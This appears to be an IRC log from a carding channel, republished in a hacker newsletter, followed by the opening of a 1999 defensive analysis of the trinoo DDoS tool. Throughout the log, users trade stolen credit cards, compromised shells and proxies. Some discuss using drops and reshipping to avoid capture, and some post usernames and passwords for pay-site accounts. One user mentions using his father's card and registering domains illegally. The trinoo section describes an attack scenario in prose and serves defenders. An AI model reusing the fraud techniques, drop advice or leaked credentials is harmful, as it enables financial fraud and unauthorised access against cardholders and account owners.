      :DuXo! :what?
      :m4r1n4ru! :so he ripped or not ?
      :DuXo! :no man..
      :DuXo! :i telled u i checked the cc
      :DuXo! :where is he 
      :DuXo! :i will talk with him
      :DuXo! :and check the CCs again
      :DuXo! :and give to the channel
      :m4r1n4ru! :ok
      :DuXo! :i don`t have the logs....
      :DuXo! :to prove right now..
      :hhkrgb
      :co^digigi! :hekss
      :co^digigi! :heks...
      :co^digigi! :i have a shell...and wanna trade with calling card
      :co^digigi! :serious person msg me 
      :DuXo! :cool
      :Co0lWoRx! :yo
      :DuXo! :let`s got to work
      :DuXo! :gety
      :DuXo! :get
      :DuXo! :and try that .
      :Co0lWoRx! :damn it
      :DuXo! :what the fuck is this :)
      :seriuscar! :what did you have in mind about tradi
      :seriuscar! :have bnc, proxies and shell....msg me if want to trade
      :seriuscar! :have bnc, proxies and shell....msg me if want to trade
      :Drake``! :co^digigi left after ripping me
      :Drake``! :hehehe
      :Co0lWoRx! :yo drake
      :seriuscar! :have bnc, proxies and shell....msg me if want to trade
      :seriuscar! :have bnc, proxies and shell....msg me if want to trade
      :seriuscar! :have bnc, proxies and shell....msg me if want to trade
      :MRuiCosta! :ACTION will trade virgin mc and visa for a shell acct that lets me dns host a .net site
      :taur! :salut
      @hello
      
      :taur! :astia tac si fac
      @this people are doing it silently (this is "they are efficient")
      
      :ows
      :ows
      :ows
      :MonTs! :howdy folks?
      :xKurko! :Can anyone do me a favour... Msg me.... Virgin CC in it for ya
      :xKurko! :Can anyone do me a favour... Msg me.... Virgin CC in it for ya
      :iDoetS! :gollllllllllllll
      :iDoetS! :1 more
      :MonTs! :1 more for whom?
      :iDoetS! :ceko
      :m4r1n4ru! :-join #rocarding
      :m4r1n4ru! :-save
      :xKurko! :can anyone gimme one fast proxy???
      :m4r1n4ru! :-op
      :|AmDeAtH! :-op 
      :|AmDeAtH! :lol hehe
      :Reaggyman! :Do sombody now what the program ares do?
      :Reaggyman! :whats ares?
      :trinix! :sup all?
      :Reaggyman! :trinix: do you now what ares is
      :trinix! :any one got any tips for ordering stuff to yer own house with out getting caugfht?
      :trinix! :caught?
      :trinix! :no
      :trinix! :sultrix says u guys are the ones to ask
      :Reaggyman! :Do you now a program that cracks sex(enter)password?
      :trinix! :nope
      :Reaggyman! :are you new here?
      :trinix! :yeah
      :Reaggyman! :me to
      :Reaggyman! :nowbody answers
      :trinix! :I am from uk
      :Reaggyman! :Norway
      :trinix! :I need help on how to order to my house with out getting caught
      :trinix! :using cc
      :Reaggyman! :What?
      :Reaggyman! :Order What?
      :trinix! :I wanna order stuff yeah but want to order straight to my house in the uk
      :Reaggyman! :isent that easy?
      :trinix! :hmm not sure
      :trinix! :I wanna an abandoned house but can't find any
      :Reaggyman! :I dont now
      :Reaggyman! :i came here to
      :Reaggyman! :i need a cracking program
      :trinix! :why dun you just go to www.xxxpassowrds.com
      :glipy! :what cracking program
      :Reaggyman! :i dont think they got THAT kind of passwords
      :Reaggyman! :The name is Ares
      :Reaggyman! :Hi sultrix
      :trinix! :heya man
      :Reaggyman! :i was band for xxxpasswords
      :Sultrix! :Hello
      :Sultrix! ::-(
      :Reaggyman! :Can you help me sultriz
      :Reaggyman! :x
      :Sultrix! :Can you guys help me i had a few working CC's but the dun work no more cxan anyone throw me few WORKING cc's my way please ?
      :Sultrix! :Reaggyman: Sure whatsup ?
      :Reaggyman! :Do you now a program that cracks sex(enter)password?
      :MonTs! :Reaggyman ....try going to http://www.catfiles.net/adult.htm
      :Sultrix! :hmm
      :Sultrix! :no idea
      :Reaggyman! :Monts: whats that?
      :MonTs! :go there and have a look
      :Reaggyman! :and this is 
      :Reaggyman! :password?
      :Reaggyman! :Hi tauer
      :Tauer! :hi
      :Reaggyman! :can you help me?
      :Reaggyman! :Do you now a program that cracks sex(enter)password?
      :astavista! :lol
      :trinix! :shit can anyone slide me some tips?
      :tauer! :mai 
      @ man
      
      :tauer! :asa ceva mai greu
      @ this is a little bit harder
      
      :trinix! :shit can anyone slide me some tips?
      :Reaggyman! :tauer what+
      :tauer! :dar poti s-a te duci la un site care da passworduri pt siteuri de genu asta
      @ but you can go to a site who gives passwords for sites like that
      
      :trinix! :wtf
      :tauer! :sau potzi s-a te inregistrezi cu un card
      @ or you can register yourself with a card
      
      :Reaggyman! :English plis
      :tauer! :lol
      :tauer! :u can go to a site thwt give u password
      :tauer! :sheet
      :tauer! :sorry
      :trinix! :wtf
      :tauer! :anibody spek romanian?
      :trinix! :shit can anyone give me some tips?
      :tauer! :what kind of tips?
      :tauer! :trinix?
      :Sultrix! :in credit card fraud he means
      :tauer! :lol
      :tauer! :what i am thinking....:)
      :Sultrix! :heh
      :tauer! :the chanel carding
      :trinix! :I wanna send some stuff to my house in the uk, any tips on how to not get caught?
      :tauer! :is hard to someone to teel u about theat
      :tauer! :in uk?
      :tauer! :is verry hard
      :trinix! :what?
      :tauer! :but u can sendit to me in other country
      :trinix! :is hard to someone to teel u about theat <------------ what?
      :tauer! :and i can sendit to u
      :trinix! :nah
      :tauer! :about:I wanna send some stuff to my house in the uk, any tips on how to not get caught?
      :xKurko! :I offered that and Im in the UK with a different drop than my house
      :trinix! :I have cc of people in USA and wanna buy stuff in the UK and send it to me in my house
      :tauer! :i dont write to well in enghlish
      :trinix! :any tips?
      :tauer! :u can sendit to me in romania and i sendit to u after the pocket arieve to me
      :tauer! ::)
      :trinix! :nah take to long
      :tauer! :lol
      :tauer! :is my turn?
      :trinix! :besides you might keep it
      :tauer! :to ping time out?
      :tauer! :food weaponds?
      :tauer! :flood
      :trinix! :wb bro
      :Sultrix! :ta 
      :Sultrix! :wassup bra
      :trinix! :nadda
      :trinix! :reading up on some shit
      :Sultrix! :cool
      :Sultrix! :Has anyone here got any WORKING CC numbers ?
      :tauer! :i sell vodoo 3 3000 100$
      :tauer! :whith id
      :tauer! ::)
      :damang! :need some fresh cc
      :Sultrix! :me too
      :YesIAm! :haha
      :trinix! :me too
      :Sultrix! :Anyone got any cc numbers that work
      :trinix! :answer him god damn it
      :YesIAm! :my cc number works 
      :fus10nx! :nope...
      :YesIAm! ::)
      :CC-Master! :who trade here?
      :fus10nx! :not U
      :fus10nx! :Not I
      :trinix! :fus10nx yeah....
      :CC-Master! :?
      :CC-Master! :so 
      :CC-Master! :anyone for trade round here?
      :damang! :shells for fresh cc
      :CC-Master! :what shels or ccz?
      :damang! :i have shelz
      :Sultrix! :Does anyone have any CC's ??
      :CC-Master! :ye
      :CC-Master! :i have 
      :CC-Master! :so?
      :Sultrix! :that i can have
      :YesIAm! :hahaahaha
      :Sultrix! :ffs
      :damang! :need some fresh cc
      :Sultrix! :Can nayone dish some ccs my wya pease
      :YesIAm! :If somebody wanted to donate a # he would paste it into the chan
      :damang! :i have shelz wana trade w/ cc
      :BONI! :hi anyone for trade?
      :YesIAm! :<CC-Master> anyone for trade round here?
      :BONI! :?
      :BONI! :so>?
      :rgers! :hi boni
      :rgers! :how are u?
      :rgers! ::))
      :Nic[AwaY]! :ACTION have a lot of ccs ( Mastercards and Visas ) trading for more or eggdroppable shells
      :Papa-tudo! :anyone trade bncs with vhosts?
      :Papa-tudo! :ACTION trading bncs with vhosts
      :Papa-tudo! :ACTION trading bncs with vhosts
      :Papa-tudo! :ACTION trading bncs with vhosts
      :ureche! :re
      :_Mephisto! :re
      :_Mephisto! :cine pizda masii a pus topicul ala idiot?
      @ who the fuck set that stupid topic?
      
      :SIZIF! :enybody have cc?
      :Bl4ck_! :t4b4cu
      :ucok! :hai
      :Bl4ck_! :salut
      @ hello
      
      :ucok! :
      :ucok! :xeexxexeexxeeeexe
      :t4b4cu! :salut
      @ hello
      
      :dlotos33! :is there anyone from MACEDONIA?
      :SIZIF! :yep
      :blazo99! :what's the problem duds
      :FanTom! :some one wots to trade
      :GoDsHaNd! :can someone help me?
      :blazo99! :what's the problem
      :GoDsHaNd! :blazo99
      :GoDsHaNd! :ej
      :GoDsHaNd
      :Pinu\away! :hi
      :t4b4cu! :c
      :Clasher! :Sorry to bother, but, does anyone have a spare card?
      :Co0lWoRx! :
      :Bl4ck_! :m4r1n4ru
      :Bl4ck_! :m4r1n4ru
      :Bl4ck_! :m4r1n4ru
      :m4r1n4ru! :marca ma
      @ (???)
      
      :Co0lWoRx! :7me any1 here wanna earn +v, msg me now
      :Co0lWoRx! :ACTION any1 here wanna earn +v, msg me now
      :Co0lWoRx! :ACTION any1 here wanna earn +v, msg me now
      :Bl4ck_! :de ce am ban pe #rocarding?
      @ why am I banned on #rocarding?
      
      :Bl4ck_! :Co0lWoRx :PP
      :m4r1n4ru! :?
      :Co0lWoRx! :?
      :Co0lWoRx! :?
      :Co0lWoRx! :???
      :Bl4ck_! :Co0lWoRx I used to have +v in here
      :Bl4ck_! ::>>
      :Co0lWoRx! :well, y u loose it?
      :Bl4ck_! :dunno
      :Bl4ck_! :never minds
      :Bl4ck_! ::>>
      :SIZIF! :enybody have cc?
      :Co0lWoRx! :look at this shit ppl
      :Co0lWoRx! :<SIZIF> do u have cc's?
      :Co0lWoRx! :<Co0lWoRx> hmmm, yes, a lot
      :Co0lWoRx! :<SIZIF> would u like to send me just one?
      :Co0lWoRx! :<Co0lWoRx> hahahaha, go away pls lamer
      :SIZIF! :enybody have cc?
      :Co0lWoRx! :ure banned man, bye
      :SIZIF! :IZIF> <SIZIF> succker <Co0lWoRx
      :dlotos33! :GoDsHaNd IS RIPPER
      :dlotos33! :GoDsHaNd IS RIPPER
      :dlotos33! :GoDsHaNd IS RIPPER
      :dlotos33! :GoDsHaNd IS RIPPER
      :dlotos33! :GoDsHaNd IS RIPPER
      :dlotos33! :GoDsHaNd IS RIPPER
      :dlotos33! :GoDsHaNd IS RIPPER
      :dlotos33! :GoDsHaNd IS RIPPER
      :dlotos33! :GoDsHaNd IS RIPPER
      :dlotos33! :GoDsHaNd IS RIPPER
      :Co0lWoRx! :ok ok
      :yourlife! :k
      :Co0lWoRx! :w8
      :GoDsHaNd! :no i'm not
      :_Mephisto! :he is right
      :GoDsHaNd! :he want to gave CC which doesn't work
      :GoDsHaNd! :i sad to him to gave me to check fhirst
      :GoDsHaNd! :i'm not RIPPER
      :yourlife! :proove it ,,,
      :GoDsHaNd! :how?
      :_Mephisto! :give to all a good card
      :GoDsHaNd! :ahahahahahahahaa
      :GoDsHaNd! :you r crazy
      :DuXo! :hi too all
      :DuXo! :how are we today
      :yourlife! :who win football ? danmark or holland ? 
      :Co0lWoRx! :holland
      :DuXo! :Holland :)
      :DuXo! :3:0
      :_Mephisto! :3-0
      :_Mephisto! :hey what do you think of romania?
      :DuXo! :has been storm around?
      :Co0lWoRx! :nope
      :yourlife! :tomorrow will be a great match 
      :DuXo! :yes
      :yourlife! :Ger-Eng
      :DuXo! :Germany  - England
      :DuXo! :..
      :yourlife! :very big battle 
      :DuXo! :anyone here from Europe and wanna Chat ???
      :Co0lWoRx! :me...
      :DuXo! ::))
      :DuXo! :i already know u cool:)
      :DuXo! :anyone see Playboy?
      :Co0lWoRx! :hmmmmmmm, ok
      :Co0lWoRx! :i want playboy
      :DuXo! ::)
      :DuXo! :LoL
      :Co0lWoRx! :yo duxo, go card a membership at www.playboy.com
      :DuXo! :why?
      :DuXo! ::))
      :Co0lWoRx! :so we can use it, go pls
      :Co0lWoRx! :for me....
      :Clasher! :Sorry to bother, but, does anyone have a spare card?
      :Co0lWoRx! :=o)
      :DuXo! ::)
      :DuXo! ::)
      :dlotos33! :Enyone is from ROMANIA?
      :DuXo! :
      :DuXo! :
      :DuXo! :go 
      :DuXo! :see some girls
      :DuXo! :www.playboy.com
      :DuXo! :username : duxoboy16
      :Bl4ck__! :lolz
      :DuXo! :pass : dukovski16]
      :DuXo! :pass : dukovski16
      :DuXo! :pass : dukovski16
      :DuXo! :don`t see the fucking pc all the day
      :Co0lWoRx! :no man
      :Co0lWoRx! :w8
      :Co0lWoRx! :w8
      :Bl4ck__! :looolz
      :Bl4ck__! :www.schoolgirls.com
      :DuXo! :http://cyber.playboy.com/members
      :DuXo! :http://cyber.playboy.com/members
      :DuXo! :hm.
      :DuXo! :that`s good too..
      :DuXo! :i have account on that
      :DuXo! :but i don`t know the fucking pass
      :Bl4ck__! :username : dementul@qubemail.com
      :DuXo! :;)))
      :Bl4ck__! :pass cromo34
      :Bl4ck__! ::>>
      :DuXo! :come on 
      :DuXo! :go shake ur dicks:)))))
      :Co0lWoRx! :lol
      :_Mephisto! ::P
      :DuXo! :put ur dick in the Cd-rom :)) because u can`t put it in pussy :))))))
      :yourlife! :?
      :DuXo! :what ???
      :yourlife! ::)
      :m4r1n4ru! :-join #rocarding
      :m4r1n4ru! :-save
      :TanTouze! :I was sexually assaulted by Bill Clinton
      :DuXo! :anyone here wants to be my drop?
      :Sp07! :sup
      :Sp07! :im done with high school
      :Sp07! :ahahhhhhhhhhhhhhhhhhhhhhhhhhahahaa
      :Sp07! :
      :Sp07! :@#$
      :Sp07! :
      :Sp07! :
      :DuXo! :bye to all
      :_Mephisto! :bya
      :_Mephisto! :bye
      :Tzaranul! :aaa
      :Tzaranul! :re
      :Tzaranul! ::)
      :SPANkY_! :anyone here trade msg me
      :SPANkY_! :anyone here trade msg me
      :Nightw|sH! :re Bl4ck
      :SPANkY_! :anyone here trade msg me
      :trinix! :sup all?
      :trinix! :any one want to send some ccs over my way?
      :trinix! :any one want to send some ccs over my way?
      :SPANkY_! :anyone here trade msg me
      :D1ck! :ins
      :D1ck! :J4n3 
      :SPANkY_! :anyone here trade msg me
      :SPANkY_! :anyone here trade msg me
      :SPANkY_! :anyone here trade msg me
      :dmonchild! :ACTION i am selling hardware if your intrested please /msg me for prices
      :Cyb3rL0rd! :re ppl
      :Sultrix! :Does anyone have any WORKING credit cards the will let me have one to use ?
      :hackmon! :bye
      :Sultrix! :Does anyone have any WORKING credit cards the will let me have one to use ?
      :Fr0d! :any1 op/voice wanna trade
      :m4r1n4ru! :-op
      :Co0lWoRx! :hello
      :Fr0d`! :hey
      :Fr0d`! :sup manm
      :Bl4ck_! :Chel00 heya
      :m4r1n4ru! :ajajajajaj
      :Co0lWoRx! :lol
      :Co0lWoRx! :hey negro, do u ever wonder why Chel00 never talks?
      :Bl4ck_! :coz is an emech
      :Bl4ck_! :Chel00 say hi Co0lWoRx
      :Bl4ck_! ::>
      :Chel00! :hi Co0lWoRx
      :Bl4ck_! ::PP
      :Co0lWoRx! :lol
      :Co0lWoRx! :ok
      :_KAoS_! :anyone in that wants to trade?
      :Fr0d! :msg me
      :Co0lWoRx! :bbl
      :TanTouze! :sell me something.... anything. QUICK
      :Bl4ck_! :ACTION is away -[ bbl ]- at 04:48a -[ P:On / L:On ]-
      :Bl4ck_! :ACTION is back -[ bbl ]- gone 1 min 49 s
      :m4r1n4ru! :-op
      :m4r1n4ru! :-op
      :connex! :i need a cc to buy a shell...anybody can help me?
      :[Mighty]! :trade CC ? 
      :Fr0d! :msg me
      :connex! :yes or visa(master)
      :Tzaranul! :re
      :Tzaranul! ::)
      :connex! :i need a cc to buy a shell...anybody can help me?
      :connex! :i need a cc to buy a shell...anybody can help me?
      :_Mephisto! :where do you buy the shell???
      :Bl4ck_! :www.turbulent.net
      :Bl4ck_! :www.turboshell.com
      :Bl4ck_! :www.shellyeah.org
      :Bl4ck_! :www.bestshell.com
      :_Mephisto! :thx
      :Bl4ck_! ::>
      :[sm0ke]! :is turbulent.net cardable?
      :m4r1n4ru! :nope
      :m4r1n4ru! :ajajajaaja
      :[sm0ke]! :hehe. i knew it. .
      :[sm0ke]! :u have to mail da freakin receipt. .. to have it activated. .
      :connex! :i need a cc to buy a shell...anybody can help me?
      :connex! :pls help me
      :_Mephisto! :bye
      :connex! :i need a cc to buy a shell...anybody can help me?
      :connex! :pls help me
      :[sm0ke]! :buy a shell? where?
      :connex! :[sm0ke] help me
      :connex! :[sm0ke] help me i want to buy a shell
      :TheRason! :hello anybody
      :TheRason! :i need a cc to buy a web domain 
      :[sm0ke]! :
      :card-it! :trading lists, /msg me....
      :card-it! :trading lists and merchants, /msg me....
      :card-it! :no traders in here?
      :Bl4ck_! :ACTION is away -[ Starcraft si astea si alea ]- at 06:26a -[ P:On / L:On ]-
      :card-it! :trading lists and merchants, /msg me....
      :card-it! :trading lists and merchants, /msg me....
      :card-it! :trading lists and merchants, /msg me....
      :card-it! :trading lists and merchants, /msg me....
      :card-it! :trading lists and merchants, /msg me....
      :|Makaveli! :how can we get the +v???
      :|Makaveli! :or an op
      :gatorade^! :ACTION is trading ccz msg me
      :J4n3! :D1ck  ?
      :D1ck! :yep
      :D1ck! :y0
      :D1ck! :i am from my dad's laptiop
      :D1ck! :sun
      :D1ck! :i need a webpage
      :D1ck! :for the box
      :J4n3! :webpage ?
      :D1ck! :deal finialised
      :D1ck! :and u know how can i accept credit card online?
      :J4n3! :yeah u can but fruad bauth hoga, but
      :D1ck! :?
      :J4n3! :if u set the rule that fax or email the scanned copy of credit card phir sahi hai
      :D1ck! :we have to pay for fraud or its their responsibility/
      :D1ck! :oh
      :D1ck! :kool
      :J4n3! :yeah :)
      :D1ck! ::)
      :D1ck! :can u start the page
      :D1ck! :?
      :J4n3! :server ka kyia huwa ?
      :J4n3! :webpage ban jayega forun, j0e kay site ka matter hai meray pass, just need the prices
      :J4n3! :what's the compnay name ? i mean site name ?
      :J4n3! :?
      :D1ck! :got d/c
      :J4n3! :wb
      :J4n3! :webpage ban jayega forun, j0e kay site ka matter hai meray pass, just need the prices
      :D1ck! :thx
      :J4n3! :what's the compnay name ? i mean site name ?
      :D1ck! :company's name is  'Big Stuff'
      :D1ck! :or u have any beter name?
      :D1ck! :i want a site some thing like www.unixrules.net
      :D1ck! :i`ll tell u the prices
      :J4n3! :hmm
      :J4n3! :unixrules is booked i think
      :D1ck! :no no
      :D1ck! :i am ssaying
      :D1ck! :look at their page
      :D1ck! :it rox
      :J4n3! :oh u mean designing ?
      :D1ck! :yeps
      :D1ck! :hehe
      :D1ck! :'Big Stuff' 
      :D1ck! :The Ultimate Web Solution.
      :J4n3! :hmm
      :D1ck! :till when will be the website complete?
      :J4n3! :wait lemme take a look
      :D1ck! :oki
      :J4n3! :hmm yeah saw it
      :D1ck! :kewl
      :D1ck! :what prices should we do?
      :J4n3! :no idea i think it should start from 9 to 10 $ for shell
      :J4n3! :3 to 4 for bnc
      :D1ck! :oki
      :J4n3! :webhosting i'll ask j0e
      :D1ck! :okies
      :J4n3! :oye what bout server ??
      :D1ck! :  4 background processes (eggdrop, screen, irc) 
      :J4n3! :got this box its fast 24.66.83.137.mb.wave.home.com
      :D1ck! :  2 login names 
      :D1ck! :  20 MB total disk space 
      :D1ck! :  FTP, and SSH access 
      :D1ck! :  2 POP3 Email addresses (username@celebreum.net) 
      :D1ck! :  Access to hundreds of VHOSTS 
      :D1ck! :  3 months [$30] - 6 months [$60] - 12 months [$120]
      :D1ck! :  Credit Card Customers, Sign up here
      :D1ck! :  Sign up Now
      :J4n3! :but no linux root kit :(
      :D1ck! :server?
      :D1ck! :heheh
      :J4n3! :i mean have u finalized? 
      :D1ck! :my computer is not working
      :D1ck! :thats why i am in this
      :D1ck! :yep
      :J4n3! :oh
      :D1ck! :finisalised
      :J4n3! :going to pay for it ?
      :D1ck! :yep
      :J4n3! :anuallay ?? how much ?
      :D1ck! :welp
      :D1ck! :200/month
      :D1ck! :and rent is 25 
      :D1ck! :225
      :J4n3! :oh kewl
      :J4n3! :ip's ?
      :J4n3! :how much ip's ?
      :D1ck! :256
      :D1ck! ::")
      :J4n3! :great :)
      :D1ck! :hehe
      :D1ck! :wait i`ll send u .txt for shells
      :D1ck! :one sec
      :J4n3! :k
      :J4n3! ::)
      :D1ck! ::)
      :J4n3! :Caldera OpenLinux(TM)
      :J4n3! :Version 2.2
      :J4n3! :Copyright 1996-1999 Caldera Systems, Inc.
      :D1ck! :oye accept this
      :J4n3! :send send
      :J4n3! :bin/login: error in loading shared libraries: libcrypt.so.1: cannot open shared object file: No such file or directory
      :D1ck! :make it attractive and stuff
      :J4n3! : DCC Unable to create connection: Connection refused
      :D1ck! :err
      :D1ck! :copy paste this
      :D1ck! :SPECIAL PACKAGE
      :D1ck! :  
      :D1ck! :  4 background processes (eggdrop, screen, irc, energymechs) 
      :D1ck! :  25 MB total disk space 
      :D1ck! :  FTP, and SSH access 
      :D1ck! :  2 POP3 Email addresses (username@celebreum.net) 
      :D1ck! :  Access to hundreds of VHOSTS 
      :D1ck! :  
      :D1ck! :  1 month [$20] 3 months [$40] - 6 months [$60] - 12 months [$120]
      :D1ck! :SILVER SHELL ACCOUNT 
      :D1ck! :  2 background processes (eggdrop, screen, irc, energymechs) 
      :D1ck! :  10MB total disk space 
      :D1ck! :  FTP, and SSH access 
      :D1ck! :  POP3 Email addresses (username@celebreum.net) 
      :D1ck! :  Access to hundreds of VHOSTS 
      :D1ck! :  1 month [$10] 3 months [$30] - 6 months [$55] - 12 months [$100] 
      :D1ck! : 
      :D1ck! :GOLD SHELL  
      :D1ck! :  4 background processes (eggdrop, screen, irc, energymechs) 
      :D1ck! :  2 login names 
      :D1ck! :  FREE Personal vhost   (username@can.choose.from.many.domains)
      :D1ck! :  100 MB total disk space 
      :D1ck! :  FTP and SSH access 
      :D1ck! :  2 POP3 Email addresses (username@celebreum.net) 
      :D1ck! :  Access to hundreds of VHOSTS 
      :D1ck! :  3 months [$60] - 6 months [$110] - 12 months [$200] 
      :D1ck! :make the rupeese too pls
      :D1ck! ::P
      :J4n3! :hah u forgot to write the BitchX ?
      :D1ck! :oh yes
      :D1ck! :irc==BitchX
      :J4n3! :eggdrop, screen, irc, energymechs, BitchX
      :D1ck! :yep yep
      :D1ck! :add it
      :D1ck! ::P
      :J4n3! :ok
      :J4n3! :kkz wait lemme copy it
      :D1ck! :oye thats stolen from unixrules
      :D1ck! :so change it a bit
      :D1ck! :jhehe
      :D1ck! :hehe
      :J4n3! :ok done :)
      :J4n3! :yeah don worry prices r same ?
      :J4n3! :or u modified it ?
      :D1ck! :modified
      :D1ck! :and mb space too
      :J4n3! :kkz
      :J4n3! :Celebrium ?
      :D1ck! :yep
      :D1ck! :ok now webpage
      :D1ck! :BASIC WEBHOSTING  
      :D1ck! :  100MB disk space 
      :D1ck! :  1 Mailbox (POP3/SMTP) 
      :D1ck! :  $0.50 per MB on any average storage beyond the standard   allowed disk space 
      :D1ck! :  500 MB of data transfer per month 
      :D1ck! :  3 months [$30] - 6 months [$55] - 12 months [$100] 
      :D1ck! :PRIME WEBHOSTING  
      :D1ck! :  200 MB disk space 
      :D1ck! :  5 Mailboxes (POP3/SMTP) 
      :D1ck! :  FREE Domain Name Registration (internic fee applies) 
      :D1ck! :  Unlimited email address forwarding 
      :D1ck! :  Custom CGI script directory 
      :D1ck! :  $0.50 per MB on any average storage beyond the standard   allowed disk space 
      :D1ck! :  1500 MB of data transfer per month 
      :D1ck! :  3 months [$60] - 6 months [$110] - 12 months [$200]
      :D1ck! :PRO WEBHOSTING  
      :D1ck! :  350 MB disk space 
      :D1ck! :  25 Mailboxes (POP3/SMTP) 
      :D1ck! :  Unlimited email address forwarding 
      :D1ck! :  Custom CGI script directory 
      :D1ck! :  PHP3 access 
      :D1ck! :  Frontpage Extension access 
      :D1ck! :  $0.50 per MB on any average storage beyond the standard   allowed disk space 
      :D1ck! :  5000 MB of data transfer per month 
      :D1ck! :  3 months [$150] - 6 months [$275] - 12 months [$500]
      :D1ck! :modify style and idhar udhar so it doesnt look as we stole it
      :D1ck! :hehe
      :J4n3! :hah is say kuch nahi hotha waisy bee almost sub shells kay milthay julthay hain
      :D1ck! :EMAIL HOSTING  
      :D1ck! :   FREE Domain Name Registration (Internic Fee applies) 
      :D1ck! :   username@your-company.com 
      :D1ck! :   5 Mailboxes (POP3) 
      :D1ck! :   25 Emails Forwarding 
      :D1ck! :  3 months [$30] - 6 months [$50] - 12 months [$75] 
      :D1ck! :lol
      :D1ck! :yup
      :D1ck! ::P
      :D1ck! :oye when will it be complete
      :D1ck! :asnd i am signing up legal domain
      :D1ck! :where should i?
      :D1ck! :cheapest
      :D1ck! :?
      :J4n3! :hmmm
      :D1ck! :mater may we are OC3 :P
      :J4n3! :dotster.com
      :D1ck! :OC3 lines
      :D1ck! :ok
      :J4n3! :yeah from where u getting this server ? and till when u get it ?
      :J4n3! :it should be on redhat ok ?
      :D1ck! :easilyhosted
      :D1ck! :yep
      :D1ck! :it is
      :D1ck! :i`ll make it ultra secure
      :D1ck! :redhat 6.2
      :J4n3! :haha kewl 
      :D1ck! :i`ll upgrade to new kernel
      :J4n3! :give me 2 days for web
      :D1ck! :2.2.16
      :D1ck! :kewl
      :D1ck! :okies
      :J4n3! ::)
      :D1ck! :the day u do it
      :D1ck! :the next day ill get the seerver
      :D1ck! :online
      :J4n3! :hmmm
      :J4n3! :talked to ur dad bout it ?
      :D1ck! :ofcourse
      :D1ck! :he sed 'yes'
      :D1ck! :and i have his cc in my hand
      :D1ck! ::P
      :J4n3! :haha cool
      :J4n3! :woooo
      :J4n3! ::p
      :D1ck! ::/
      :J4n3! :lekin signup kahan say kiya ?? konsee company say ? 
      :J4n3! :t3 ?
      :J4n3! :or oc3 ?
      :D1ck! :well
      :D1ck! :more then Tota1KaaS1
      :D1ck! :t1
      :D1ck! :but
      :D1ck! :technically OC3
      :D1ck! :ll providers who sya they are oc3 are lieing, yes technicqally they
      :D1ck! :are
      :J4n3! :ahaan
      :D1ck! :but its shared bandwith
      :D1ck! :mine will be 990k/sec
      :J4n3! :w00ps
      :D1ck! :to 2 mb
      :D1ck! :and 40 gigs of transfer
      :J4n3! :shells will rock on this server
      :D1ck! :yep
      :D1ck! ::)
      :D1ck! :and i`ve heard routers are firewalled
      :D1ck! :so thats a good enws
      :J4n3! :great already signed up , or going to ?
      :D1ck! :oye pls get started on the page if u are not too bz
      :D1ck! ::P
      :D1ck! :i will send the payment
      :J4n3! :yeah i will from today
      :D1ck! :no cc
      :D1ck! :and today i`ll buy a merchant account
      :J4n3! :oh ohkay :)
      :D1ck! ::)
      :J4n3! :u have too many ips
      :D1ck! :yep
      :J4n3! :we can buy more domains illlegaly to like j0e but
      :D1ck! :that rox
      :D1ck! :well
      :D1ck! :i can get caught
      :J4n3! :first we need the dns of ur server so we can give it when registering the domain
      :D1ck! ::p
      :J4n3! :like ns1 and ns2
      :J4n3! :they need it for registeration
      :D1ck! :oh
      :D1ck! :i am half way through the registration
      :D1ck! :hehe
      :D1ck! :so i cant modify it later?
      :J4n3! :yeah :)
      :D1ck! :kewl
      :D1ck! :almost complete
      :J4n3! ::))))))
      :D1ck! :hehe
      :D1ck! :a graphix of Big Tecnologies would rock
      :J4n3! :sure it would , just see
      :D1ck! ::/
      :D1ck! :oki
      :J4n3! ::9:0:)
      :D1ck! ::)
      :J4n3! :how do i open a telnet on a box ?? from inetd.conf ? when it say connection refused on 23 , its not on hosts.allow
      :D1ck! :err they need name serfver
      :D1ck! :hehe
      :D1ck! :cat /etc/inetd.conf | grep telnet
      :D1ck! :and paste me here
      :J4n3! :yeah wait
      :J4n3! :hahah yeah
      :J4n3! :its close from there
      :J4n3! :the box is kewl i want to run psy from there
      :J4n3! :ip is admin.cgocable.net
      :J4n3! :wait lemme opne it
      :D1ck! :hehhe
      
      Day 14 June 17
      
      
      
      
      
      
      
307.0 [IND] Trinoo DDoS Analysis
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~
            
      ==========================================================================
      
        The DoS Project's "trinoo" distributed denial of service attack tool
      
      ==========================================================================
      
      David Dittrich <dittrich@cac.washington.edu>
      University of Washington
      Copyright 1999. All rights reserved.
      October 21, 1999
      
      
      Introduction
      ------------
      
      The following is an analysis of the DoS Project's "trinoo" (a.k.a.
      "trin00") master/slave programs, which implement a distributed
      network denial of service tool.
      
      Trinoo daemons were originally found in binary form on a number of
      Solaris 2.x systems, which were identified as having been compromised
      by exploitation of buffer overrun bugs in the RPC services "statd",
      "cmsd" and "ttdbserverd".  These attacks are described in CERT
      Incident Note 99-04:
      
              http://www.cert.org/incident_notes/IN-99-04.html
      
      The trinoo daemons were originally believed to be UDP based,
      access-restricted remote command shells, possibly used in conjunction
      with sniffers to automate recovering sniffer logs.
      
      During investigation of these intrusions, the installation of a trinoo
      network was caught in the act and the trinoo source code was obtained
      from the account used to cache the intruders' tools and log files.
      This analysis was done using this recovered source code.
      
      Modification of the source code would change any of the details
      in this analysis, such as prompts, passwords, commands, TCP/UDP port
      numbers, or supported attack methods, signatures, and features.
      
      The daemon was compiled and run on Solaris 2.5.1 and Red Hat Linux 6.0
      systems.  The master was compiled and run on Red Hat Linux 6.0.  It is
      believed that both master and daemon have been witnessed "in the
      wild" on these same platforms.
      
      Trinoo networks are probably being set up on hundreds, perhaps
      thousands, of systems on the Internet that are being compromised by
      remote buffer overrun exploitation.  Access to these systems is
      probably being perpetuated by the installation of multiple "back
      doors" along with the trinoo daemons.
      
      A trinoo network of at least 227 systems -- 114 of these at Internet2
      sites -- was used on August 17, 1999 to flood a single system at the
      University of Minnessota, swamping the target network and rendering it
      unusable for over two days.  While responding to this attack, large
      flows were also noticed going to at least sixteen other systems, some
      outside the US.  (See Appendix D for a report of part of this trinoo
      attack.) 
      
      
      Attack scenario
      ---------------
      
      A typical installation might go something like this.
      
      1).  A stolen account is set up as a repository for pre-compiled
      versions of scanning tools, attack (i.e. buffer overrun exploit)
      tools, root kits and sniffers, trinoo daemon and master programs,
      lists of vulnerable hosts and previously compromised hosts, etc.  This
      would normally be a large system with many users, one with little
      administrative oversight, and on a high-bandwidth connection for rapid
      file transfer.
      
      2).  A scan is performed of large ranges of network blocks to identify
      potential targets.  Targets would include systems running various
      services known to have remotely exploitable buffer overflow security
      bugs, such as wu-ftpd, RPC services for "cmsd", "statd",
